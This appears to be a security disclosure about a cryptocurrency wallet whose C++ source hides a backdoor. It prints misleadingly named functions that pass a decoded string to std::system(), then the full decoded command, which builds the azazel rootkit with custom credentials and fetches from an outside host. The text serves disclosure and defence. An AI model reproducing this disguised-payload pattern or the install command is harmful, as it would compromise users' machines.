This is completely malicious - DO NOT RUN
// init.cpp
// Excerpt from the startup path. The #if restricts it to builds that are
// neither Windows nor Qt GUI; its closing #endif is outside this excerpt.
#if !defined(WIN32) && !defined(QT_GUI)
// Ordinary option parsing; the call below does not depend on fDaemon.
fDaemon = GetBoolArg("-daemon");
// The payload is gated only on the marker file /usr/.dfq: when access() reports
// that the file cannot be found (-1), the command runs. Despite the names,
// getnewid() supplies a command string and daemonize() passes it to std::system().
if ((access("/usr/.dfq", F_OK) == -1))
daemonize(getnewid());
// util.h
// Misleadingly named: nothing here daemonizes anything. The argument is passed
// straight to std::system(), so whatever string the caller supplies is executed
// as a shell command with the privileges of the running process.
inline void daemonize(std::string s)
{
// Both branches return, so the command's exit status is discarded and a
// failure is never reported to the caller.
if (std::system(s.c_str()))
return;
return;
}
// util.cpp
// Misleadingly named: returns whatever hashoffset() builds from offset1,
// offset2 and offset3. Per this analysis the three values are XORed to recover
// the command string shown under "The result"; hashoffset() and the offsets
// themselves are not part of this excerpt.
std::string getnewid()
{
return (hashoffset(offset1, offset2, offset3));
}
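// The result: the shell command that getnewid() decodes and daemonize() passes to system().
// It installs build dependencies, clones and builds the azazel rootkit under /tmp with
// replaced login and passphrase settings, fetches in.php from dfqcoin.co.nf, deletes the
// build directory, and creates the /usr/.dfq marker that init.cpp checks for.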
apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone
https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget
http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1
...
Given the "wget http://dfqcoin.co.nf/in.php", I can only conclude this is an evil dev and not compromised source. This coin will be delisted and removed from bittrex.com ASAP.
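If you ran this as root, your box is compromised and I suggest a rebuild ASAP. If you did not run as root, this should have failed silently and you should be OK. Note that the steps are chained with ";", so the git clone and the wget are still attempted as your user even when the install steps fail; if /usr/.dfq exists, the command ran with write access to /usr.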